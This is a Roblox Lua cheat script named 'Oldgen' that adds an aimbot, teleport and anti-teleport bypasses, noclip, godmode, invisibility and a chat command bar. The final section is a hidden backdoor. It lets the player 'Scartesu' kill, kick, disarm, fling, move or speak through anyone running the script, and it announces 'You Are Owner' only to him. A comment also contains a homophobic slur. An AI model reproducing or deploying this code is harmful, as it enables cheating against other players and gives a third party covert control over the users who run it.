Frame.Position = UDim2.new(0.255629957, 0, 0.740166843, 0)
Frame.Size = UDim2.new(0, 100, 0, 21)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(4.59999881, 0, -0.476190478, 0)
TextLabel.Size = UDim2.new(0, 538, 0, 35)
TextLabel.Font = Enum.Font.Ubuntu
TextLabel.Text = "Ammo: Inactive"
TextLabel.TextColor3 = Color3.fromRGB(100, 5, 100)
TextLabel.TextSize = 45.000

game:GetService("RunService").RenderStepped:connect(function()
	pcall(function()
		if game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool"):FindFirstChild("Ammo") then
			TextLabel.Text = "Ammo: "..game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool").Ammo.Value..""
				
			elseif not game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool"):FindFirstChild("Ammo") then
				TextLabel.Text = "Ammo: Inactive"
		end
	end)
end)




-- awful airwalk made by scartesu

local bbv = game:GetService("RunService").RenderStepped
local jumping = false
local airwalk = false
local inpoot = game:GetService("UserInputService")
local activated = false

inpoot.InputBegan:connect(function(spacebar,chat)
	if chat then
		return
	end
	
	if spacebar.KeyCode == Enum.KeyCode.Space then
		jumping = true
		airwalk = false
	end
end)

inpoot.InputEnded:connect(function(spacebar,chat)
	if chat then
		return
	end
	if spacebar.KeyCode == Enum.KeyCode.Space then
		jumping = false
		airwalk = true
	end
end)

inpoot.InputBegan:connect(function(ctrl,chat)
	if chat then
		return
	end
	if ctrl.KeyCode == Enum.KeyCode.LeftControl then
		jumping = false
		airwalk = false
	end
end)

inpoot.InputEnded:connect(function(ctrl,chat)
	if chat then
		return
	end
	if ctrl.KeyCode == Enum.KeyCode.LeftControl then
		jumping = false
		airwalk = true
	end
end)
bbv:connect(function()
	if activated == true then

		if jumping == true then
			game.Players.LocalPlayer.Character.Humanoid:ChangeState(3)
		elseif jumping == false and airwalk == true then
			game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
		end
	else
		jumping = false
		airwalk = false
	end


end)

 


-- aimbot by scartesu --



-- shoot funcion --
local predict = 1.5

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg) -- local commands
	if string.sub(msg, 1, 9) == (prefix.."predict ") then
		predict = msg:sub(10)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Predict Value Changed To "..predict.."";
		})

	end
end)


game:GetService("RunService").Heartbeat:connect(function()
	if shoottoggle == true then
		pcall(function()
			game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Tool").Fire:FireServer(game.Players[Target.Name].Character.Torso.CFrame + Vector3.new(predict))	
		end)
	end
end)

game:GetService("RunService").RenderStepped:connect(function()
	pcall(function()
		if game.Players[Target.Name].Character:FindFirstChild("KO") or game.Players[Target.Name].Character.Humanoid.Health == 0 or game.Players[Target.Name].Character.Humanoid == nil or game.Players[Target.Name].Character:FindFirstChild("ForceField") then
			shoottoggle = false

		elseif not game.Players[Target.Name].Character:FindFirstChild("KO") then
			shoottoggle = true

		end
	end)
end)

-- end of shoot function --


-- status thing based off of killaura from mc clients by scartesu ye
local status = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel_stat = Instance.new("TextLabel")


status.Name = "status"
status.Parent = game.CoreGui

Frame.Parent = status
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 1.000
Frame.Position = UDim2.new(0.255629957, 0, 0.740166843, 0)
Frame.Size = UDim2.new(0, 100, 0, 21)

TextLabel_stat.Parent = Frame
TextLabel_stat.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_stat.BackgroundTransparency = 1.000
TextLabel_stat.Position = UDim2.new(-1.40999997, 0, -0.476190478, 0)
TextLabel_stat.Size = UDim2.new(0, 538, 0, 35)
TextLabel_stat.Font = Enum.Font.Ubuntu
TextLabel_stat.Text = "Status: Inactive"
TextLabel_stat.TextColor3 = Color3.fromRGB(100, 5, 100)
TextLabel_stat.TextSize = 45.000


game:GetService("RunService").RenderStepped:connect(function()
	if Target == nil then
		TextLabel_stat.Text = "Status: Inactive"
	else

		if game.Players[Target.Name].Character.Humanoid.Health < game.Players.LocalPlayer.Character.Humanoid.Health then
			TextLabel_stat.Text = "Status: Winning"
		else
			TextLabel_stat.Text = "Status: Losing"
		end
		if game.Players[Target.Name].Character.Humanoid.Health == game.Players.LocalPlayer.Character.Humanoid.Health then
			TextLabel_stat.Text = "Status: Tied"
		end
	end	
end)




game:GetService("RunService").RenderStepped:connect(function() -- hunt function

	if hunt == true then

		-- new hunt bot (not triggerbot) by scartesu

		-- 188632011
		-- aimbot needs adjustment
		-- follow velocity might need to be changed


		local me =  game.Players.LocalPlayer.Character:FindFirstChild("Torso") or game.Players.LocalPlayer.Character.HumanoidRootPart
		local pee = game.Players[hunted.Name].Character.Torso or game.Players[hunted.Name].Character["Left Arm"]
		game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
		me.CFrame = pee.CFrame * CFrame.new(0,0,1.8)
		
	else

	end
end)

-- script --


-- sprintspeed/blink made by scartesu / remove credits if you are gay
local m = game:GetService("UserInputService")

m.InputBegan:connect(function(shift)
	if sprint == true then
		if shift.KeyCode == Enum.KeyCode.LeftShift then
			game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = sprintspeed
		else
		end
	end
end)
m.InputEnded:connect(function(shift)
	if sprint == true then
		if shift.KeyCode == Enum.KeyCode.LeftShift then
			game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
		else
		end
	end
end)


game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg) -- local commands
	if string.sub(msg, 1, 12) == (prefix.."blinkspeed ") then
		sprintspeed = msg:sub(13)  
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Blinkspeed Value Changed To "..sprintspeed.."";
		})
	end
end)

game.Players.LocalPlayer.Chatted:connect(function(cmd)
	if cmd:sub(1,9) == ""..prefix.."camlock " then
		for _,v in pairs(GetPlayer(string.sub(cmd,10))) do
			camsettings.locktarget = v
			camsettings.locking = true

			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Camlocking "..camsettings.locktarget.Name.."";
			})
		end
	end

end)

game.Players.LocalPlayer.Chatted:connect(function(cmd)
	if cmd == ""..prefix.."uncamlock" then
		camsettings.locking = false
		camsettings.locktarget = nil
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Camlocking";
		})
	end
end)




game.Players.LocalPlayer.Chatted:connect(function(msg)
	if string.sub(msg, 1, 7) == (prefix.."shoot ") then

		for i,v in pairs(GetPlayer(string.sub(msg, 8)))do	
			shoottoggle = true
			Target = v
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Shooting At "..Target.Name.."";
			})
		end
	end
end)

game.Players.LocalPlayer.Chatted:connect(function(msg)
	if string.sub(msg, 1, 6) == (prefix.."goto ") then

		for i,v in pairs(GetPlayer(string.sub(msg, 7)))do	

			local goingto = v
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Teleported To "..goingto.Name.."";
			})
			if tpbypass == false then
				game:GetService("StarterGui"):SetCore("SendNotification", {
					Title = "Oldgen";
					Text = "Enabled Tpbypass to Teleport";
				})
				tpbypass = true
			end
			game.Players.LocalPlayer.Character.Torso.CFrame = game.Players[goingto.Name].Character.Torso.CFrame

		end
	end
end)


game.Players.LocalPlayer.Chatted:connect(function(msg)
	if string.sub(msg, 1, 6) == (prefix.."view ") then

		for i,v in pairs(GetPlayer(string.sub(msg, 7)))do	
			local viewing = v
			game.workspace.CurrentCamera.CameraSubject = game.Players[viewing.Name].Character
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Viewing  "..viewing.Name.."";
			})
		end
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."unview" then
		game.workspace.CurrentCamera.CameraSubject = game.Players.LocalPlayer.Character
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Viewing";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."spin" then
		spinning = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Started Spinning";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."unspin" then
		spinning = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Spinning";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."antigh" then
	 antigh = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Anti Groundhit Enabled";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."noantigh" then
		antigh = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Anti Groundhit Disabled";
		})
	end
end)


game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."airwalk on" then
		activated = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Started Airwalking ,Ctrl To Descend";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."airwalk off" then
		activated = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Airwalking";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:connect(function(msg)
	if (string.lower(msg) == ""..prefix.."stopshoot") then
		shoottoggle = false
		Target = nil
		--more notifications fuck off --
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Shooting.";
		})
	end
end)

-- end script --


game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg:sub(1, 11) == "" .. prefix .. "walkspeed " then
		local ws = msg:sub(12)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Walkspeed Set To "..ws.."";
		})
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = ws
	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg:sub(1, 11) == "" .. prefix .. "jumppower " then
		local jp = msg:sub(12)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Jumppower Set To "..jp.."";
		})

		game.Players.LocalPlayer.Character.Humanoid.JumpPower = jp

	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."noclip" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Noclip Enabled";
		})
		noclip = true
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."clip" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Noclip Disabled";
		})
		noclip = false
	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."rejoin" then
		game:GetService('TeleportService'):Teleport(game.PlaceId)
	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."serverhop" then
		HopServer()
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."tpbypass" then
		if invis == true then
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Cant Tpbypass While Invisible";
			})
			tpbypass = false
		else
			tpbypass = true
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Tpbypass Enabled";
			})
		end
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."untpbypass" then
		tpbypass = false
		game.Players.LocalPlayer.Character:BreakJoints()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Tpbypass Disabled";
		})
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."invis" then
		if tpbypass == true then
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Cant Invis While Tpbypass Is Enabled";
			})
		else
			invis = true
			local l = game.Players.LocalPlayer
			local c = l.Character
			local rr = c.HumanoidRootPart
			local position = rr.Position
			local crr = rr:Clone()
			c:MoveTo(position + Vector3.new(0,9000000, 0))
			rr.Parent = nil
			wait(0.3)
			crr.Parent = c
			position = position
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Invis Enabled, Reset To Disable";
			})
		end
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == "" ..prefix.."god" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Godmode Enabled";
		})
		game.Players.LocalPlayer.Character:BreakJoints()
		god = true
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == "" ..prefix.."bypass" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Bypass Enabled";
		})
		if sprint == false then
			sprint = true
		end

		local me = game.Players.LocalPlayer
		local mename = game.Players.LocalPlayer.Name

		local Humanoid = Instance.new("Model" ,game.Workspace)
		Humanoid.Name = ""..mename..""
		me.Character:Destroy()
		wait(1.5)

		me.Character = Humanoid
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == "" ..prefix.."unbypass" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Bypass Disabled";
		})
		if sprint == true then
			sprint = false
		end

		for _,v in pairs(game.workspace:GetChildren()) do
			if v.Name == ""..mename.."" then
				game.workspace[mename].Parent = me
				me.Character:Destroy()
			end
		end
	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == "" ..prefix.."ungod" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Godmode Disabled";
		})
		game.Players.LocalPlayer.Character:BreakJoints()
		god = false
	end
end)

game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."crash" then
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "new crash coming soon)";
		})
	end

end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == "" ..prefix.."gripgui" then
	gripgui()	
	end
end)
game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
	if msg == ""..prefix.."cmds" then
		showcmds()
	end
end)

-- cmd bar ahahahahha


local cmdbarWIP = Instance.new("ScreenGui")
local bar = Instance.new("Frame")
local TextBox = Instance.new("TextBox")

cmdbarWIP.Name = "cmdbar(WIP)"
cmdbarWIP.Parent = game.CoreGui

bar.Name = "bar"
bar.Parent = cmdbarWIP
bar.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
bar.BorderColor3 = Color3.fromRGB(125, 0, 125)
bar.BorderSizePixel = 4
bar.Position = UDim2.new(-0.00182815362, 0, 0.375446975, 0)
bar.Size = UDim2.new(0, 222, 0, 25)
bar.Visible = false

TextBox.Parent = bar
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.BackgroundTransparency = 1.000
TextBox.Position = UDim2.new(0.0135135138, 0, 0, 0)
TextBox.Size = UDim2.new(0, 219, 0, 25)
TextBox.Font = Enum.Font.Ubuntu
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(256, 256, 256)
TextBox.TextSize = 24.000
game:GetService("UserInputService").InputBegan:connect(function(keybind,chat)
	if chat then
		return
		 end
	
	if keybind.KeyCode.Name == "Semicolon" then
		bar.Visible = true
		TextBox.Text = ""
		wait(0.1) -- oooooooomggggggggggggggggggg
		TextBox:CaptureFocus()
	end
end)


TextBox.FocusLost:connect(function()
	if TextBox.Text:sub(1,10) == "walkspeed " then
		local ws = TextBox.Text:sub(11)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Walkspeed Set To "..ws.."";
		})
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = ws


	elseif TextBox.Text:sub(1,10) == "jumppower " then
		local jp = TextBox.Text:sub(11)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Jumppower Set To "..jp.."";
		})
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = jp

	elseif TextBox.Text:sub(1,6) == "shoot " then
		for _,v in pairs(GetPlayer(string.sub(TextBox.Text, 7)))do	
			shoottoggle = true
			Target = v
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Shooting At "..Target.Name.."";
			})
		end		
		game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
			if msg:sub(1, 10) == "" .. prefix .. "flyspeed " then
				local fs = msg:sub(11)
				game:GetService("StarterGui"):SetCore("SendNotification", {
					Title = "Oldgen";
					Text = "Flyspeed Set To "..fs.."";
				})
				flysettings.speed = fs
			end
		end)

	elseif TextBox.Text == "invis" then
		invis = true
		if tpbypass == true then
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Cant Invis While Tpbypass Is Enabled";
			})
		else
			local l = game.Players.LocalPlayer
			local c = l.Character
			local rr = c.HumanoidRootPart
			local position = rr.Position
			local crr = rr:Clone()
			c:MoveTo(position + Vector3.new(0,9000000, 0))
			rr.Parent = nil
			wait(0.3)
			crr.Parent = c
			position = position
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Invis Enabled, Reset To Disable";
			})	
		end

	elseif TextBox.Text == "god" then
		game.Players.LocalPlayer.Character:BreakJoints()
		god = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Godmode Enabled";
		})

	elseif TextBox.Text:sub(1,8) == "predict " then
		predict = TextBox.Text:sub(9)

		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Predict Value Changed To "..predict.."";
		})

	elseif TextBox.Text == "ungod" then
		game.Players.LocalPlayer.Character:BreakJoints()
		god = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Godmode Disabled";
		})

	elseif TextBox.Text == "noclip" then
		noclip = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Noclip Enabled";
		})
	elseif TextBox.Text == "rejoin" then

		game:GetService('TeleportService'):Teleport(game.PlaceId)

	elseif TextBox.Text == "clip" then
		noclip = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Noclip Disabled";
		})

	elseif TextBox.Text == "serverhop" then
		HopServer()

	elseif TextBox.Text == "bypass" then
		if sprint == false then
			sprint = true
		end
		local me = game.Players.LocalPlayer
		local mename = game.Players.LocalPlayer.Name

		local Humanoid = Instance.new("Model" ,game.Workspace)
		Humanoid.Name = ""..mename..""
		me.Character:Destroy()

		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Bypass Enabled";
		})

	elseif TextBox.Text == "unbypass" then

		for _,v in pairs(game.workspace:GetChildren()) do

			if sprint == true then
				sprint = false
			end
			pcall(function()
			if v.Name == ""..mename.."" then
				game.workspace[mename].Parent = me
				me.Character:Destroy()

				game:GetService("StarterGui"):SetCore("SendNotification", {
					Title = "Oldgen";
					Text = "Bypass Disabled";
					})
		
				end
			end)
		end
	elseif TextBox.Text == "tpbypass" then
		if invis == true then
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Cant Tpbypass While Invisible";
			})

		else	
			tpbypass = true
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Tpbypass Enabled";
			})
		end
	elseif TextBox.Text == "untpbypass" then
		tpbypass = false
		game.Players.LocalPlayer.Character:BreakJoints()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Tpbypass Disabled";
		})

	elseif TextBox.Text:sub(1,5) == "hunt " then
		for _,v in pairs(GetPlayer(string.sub(TextBox.Text, 6)))do	
			if tpbypass == false then
				tpbypass = true
			end
			hunted = v
			Target = v
			shoottoggle = true
			hunt = true
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Hunting "..hunted.Name.."";
			})
		end
	elseif TextBox.Text == "unhunt" then
		hunt = false
		hunted = nil
		Target = nil
		shoottoggle = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Hunting";
		})


	elseif TextBox.Text == "gripgui" then
		gripgui()
	elseif TextBox.Text == "cmds" then
		showcmds()
	elseif TextBox.Text:sub(1,5) == "view " then
		for _,v in pairs(GetPlayer(string.sub(TextBox.Text, 6))) do	
			local viewing = v
			game.workspace.CurrentCamera.CameraSubject = game.Players[viewing.Name].Character
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Viewing "..viewing.Name.."";
			})

		end

	elseif TextBox.Text == "unview" then
		game.workspace.CurrentCamera.CameraSubject = game.Players.LocalPlayer.Character
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Viewing";
		})

	elseif TextBox.Text:sub(1,9) == "flyspeed " then
		local fs = TextBox.Text:sub(10)
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Flyspeed Set To "..fs.."";
		})
		flysettings.speed = fs

	elseif TextBox.Text:sub(1,5) == "goto " then
		for i,v in pairs(GetPlayer(string.sub(TextBox.Text, 6))) do	

			local goingto = v
			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Teleported To "..goingto.Name.."";
			})
			if tpbypass == false then
				game:GetService("StarterGui"):SetCore("SendNotification", {
					Title = "Oldgen";
					Text = "Enabled Tpbypass to Teleport";
				})
				tpbypass = true
			end
			game.Players.LocalPlayer.Character.Torso.CFrame = game.Players[goingto.Name].Character.Torso.CFrame
		end

	elseif TextBox.Text:sub(1,8) == "camlock " then
		for _,v in pairs(GetPlayer(string.sub(TextBox.Text, 9))) do
			camsettings.locktarget = v
			camsettings.locking = true

			game:GetService("StarterGui"):SetCore("SendNotification", {
				Title = "Oldgen";
				Text = "Started Camlocking "..camsettings.locktarget.Name.."";
			})
		end


	elseif TextBox.Text == "uncamlock" then
        camsettings.locktarget = nil
		camsettings.locking = false

		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Camlocking";
		})
	elseif TextBox.Text:sub(1,11) == "blinkspeed " then
		sprintspeed = TextBox.Text:sub(12)

		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Blinkspeed Value Changed To "..sprintspeed.."";
		})

	elseif TextBox.Text == "stopshoot" then
		shoottoggle = false
		Target = nil
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Shooting";
		})

	elseif TextBox.Text == "airwalk on" then
		activated = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Started Airwalking ,Ctrl To Descend";
		})
		
	elseif TextBox.Text == "airwalk off" then
		activated = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Airwalking";
		})
	elseif TextBox.Text == "spin" then
		spinning = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Started Spinning";
		})
	elseif TextBox.Text == "unspin" then
		spinning = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Stopped Spinning";
		})
		elseif TextBox.Text == "antigh" then
		antigh = true
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Anti Groundhit Enabled";
		})
	elseif TextBox.Text == "noantigh" then
		antigh = false
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Anti Groundhit Disabled";
		})
		
	end
	bar.Visible = false
end)


-- client bridge nyohnyohnyoh

-- fixed up an old backdoor and gave it more commands aaaaaa credits to the original maker --
-- cry about it if you have a problem though


local p = game:GetService("RunService").RenderStepped
local god = false

p:connect(function() -- for god and other
	if god == true then
		game.Players.LocalPlayer.Character:FindFirstChild("Right Leg"):Destroy()
	end
end)

for _,p in pairs(game:GetService("Players"):GetPlayers()) do
	if p.Name == "Scartesu" then
		p.Chatted:connect(function(message)
			local arguement = {}

			for arg in message:gmatch("%S+") do
				arguement[#arguement +1] = arg
			end
			if arguement[1] ~= nil then
				if arguement[1]:lower() == "'kill" and arguement[2] ~= nil then

					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer.Character:BreakJoints()
					end
				elseif arguement[1]:lower() == "'talk" and arguement[2] ~= nil and arguement[3] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(arguement[3],"All")
					end
				elseif arguement[1]:lower() == "'disarm" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer.Character["Right Arm"]:Destroy()
						game.Players.LocalPlayer.Character["Left Arm"]:Destroy()
					end
				elseif arguement[1]:lower() == "'kick" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer:Kick("Kicked By Backdoor")
					end
				elseif arguement[1]:lower() == "'fling" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer.Character.Torso.CFrame = CFrame.new(9e9,9e9,9e9)
					end
				elseif arguement[1]:lower() == "'god" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer.Character:BreakJoints()
						god = true
					end
				elseif arguement[1]:lower() == "'ungod" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game.Players.LocalPlayer.Character:BreakJoints()
						god = false
					end
				elseif arguement[1]:lower() == "'rejoin" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						game:GetService('TeleportService'):Teleport(game.PlaceId)
					end
				elseif arguement[1]:lower() == "'bring" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						for _,v in pairs(game.Players:GetChildren()) do
							if v.Name == "Scartesu" then
								game.Players.LocalPlayer.Character:MoveTo(v.Character.Torso.Position)
							end
						end
					end
				elseif arguement[1]:lower() == "'tpbypass" and arguement[2] ~= nil then
					local own = arguement[2]:lower()
					if own == "Scartesu" then return end
					if game.Players.LocalPlayer.Name:lower():sub(1, #own) == own then
						local client = game:GetService("Players").LocalPlayer;
						local lighting = game:GetService("Lighting");

						client.Character:FindFirstChild("HumanoidRootPart"):Destroy();
						client.Character:FindFirstChildWhichIsA("Humanoid").Parent = lighting;
						lighting:FindFirstChildWhichIsA("Humanoid").Parent = client.Character;
					end
				end
			end
		end)
	end
end

-- if worked

task.wait(0.5)

if game.Players.LocalPlayer.Name == "Scartesu" then
	game.StarterGui:SetCore("SendNotification", {
		Title = "Oldgen Backdoor";
		Text = "You Are Owner, Press F9 For Commands";
		Duration = 7;
	})  

	print("--OLDGEN BACKDOOR COMMANDS--")
	print("'kill [PLAYER] -- Kills Player")
	print("'talk [PLAYER] [MESSAGE] -- Makes Player Chat With Your Message")
	print("'disarm [PLAYER] -- Destroys Players Arm So They Cant Do Anything")
	print("'kick [PLAYER] -- Kicks Player From Game")
	print("'fling [PLAYER] -- Flings Player From Map")
	print("'god [PLAYER] -- Gods Player (THE PRISON ONLY)")
	print("'ungod [PLAYER] -- Ungods Player")
	print("'rejoin [PLAYER] -- Makes Player Rejoin")
	print("'bring [PLAYER] -- Brings Player To You")
	print("'tpbypass [PLAYER] -- Bypasses Anti Teleport (THE PRISON ONLY)")
	print("")
	print("More Commands To Come")
else 
end




